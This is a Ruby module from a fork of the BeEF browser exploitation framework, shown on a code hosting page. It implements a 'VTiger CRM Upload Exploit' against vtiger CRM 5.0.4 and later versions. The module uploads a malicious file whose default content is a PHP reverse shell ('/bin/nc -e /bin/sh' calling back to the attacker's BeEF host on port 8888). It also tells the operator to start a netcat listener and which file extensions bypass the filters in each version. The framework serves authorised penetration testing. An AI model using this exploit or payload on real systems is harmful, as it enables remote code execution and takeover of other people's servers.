Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
b90ddd367dfb1ac1bfb7dc8957d027b0ef31a718
beef/modules/network/vtiger_crm_upload_exploit/module.rb
scotty.b.brown@gmail.com 5c3e6f1575 Adding Apache Licence Header to all files (except VERSION file) 
git-svn-id: https://beef.googlecode.com/svn/trunk@1046 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-07-02 23:08:28 +00:00

65 lines
2.8 KiB
Ruby
Raw Blame History

#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
def initialize
time = Time.new
weekno = case time.day
when 1..7 then 1
when 8..14 then 2
when 15..21 then 3
when 22..28 then 4
else 5
end
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
super({
'Name' => 'VTiger CRM Upload Exploit',
'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a><br />The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888. <br><br>vTigerCRM 5.0.4: Use extension "PHP" and php code.<br>vTigerCRM 5.2.0: Use extension "phtml" and php code.<br>vTigerCRM 5.2.1: Use extensions "shtml" and SSI code.',
'Category' => 'Network',
'Author' => ['wade', 'bm', 'pipes', 'xntrik', 'yorikv'],
'Data' =>
[
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
{'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
{'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
{'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.net.local'
use_template!
end
def callback
return if @datastore['result'].nil?
save({'result' => @datastore['result']})
end
end
Reference in New Issue View Git Blame Copy Permalink